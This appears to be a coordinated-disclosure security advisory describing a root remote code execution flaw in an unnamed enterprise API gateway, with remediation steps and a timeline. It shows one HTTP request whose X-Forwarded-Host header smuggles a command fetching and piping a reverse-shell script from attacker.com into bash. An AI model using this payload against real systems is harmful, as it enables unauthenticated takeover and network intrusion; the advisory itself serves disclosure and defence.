ERESUS-ADV-2026-001: Remote Code Execution in Legacy Enterprise Gateway

Overview

During a recent engagement, Eresus Security researchers discovered an unauthenticated Remote Code Execution (RCE) vulnerability in a widely used but legacy enterprise API gateway. The vulnerability allows an attacker to bypass authentication and execute arbitrary commands on the underlying system with root privileges.

Technical Details

The vulnerability stems from improper input sanitization in the X-Forwarded-Host parsing component. When processing crafted HTTP headers containing bash-specific characters, the gateway's logging service naively executes them.

An attacker can exploit this by sending a malformed request:

GET /api/v1/status HTTP/1.1
Host: target-gateway.local
X-Forwarded-Host: ; bash -c 'curl http://attacker.com/revshell | bash'

Since the logging daemon runs with elevated privileges, the subsequent execution yields a root shell without requiring any authentication.

Impact

Successful exploitation allows an unauthenticated attacker to take full control of the API gateway, potentially leading to lateral movement across the internal enterprise network and exposure of highly sensitive operational data.

Remediation

Eresus Security responsibly disclosed this vulnerability to the vendor, who has since issued a patch. Users are advised to:

1. Immediately apply the latest security patch provided by the vendor.
2. Restrict external exposure of the management and logging interfaces.
3. Monitor network egress logs for suspicious outbound connections originating from the API gateway instances.

Timeline

• 2026-02-12: Vulnerability discovered during a red team engagement.
• 2026-02-15: Vendor notified under coordinated disclosure.
• 2026-02-17: Vendor acknowledged the issue and began working on a patch.
• 2026-03-01: Patch released to the public.
• 2026-03-15: Eresus Security published this advisory.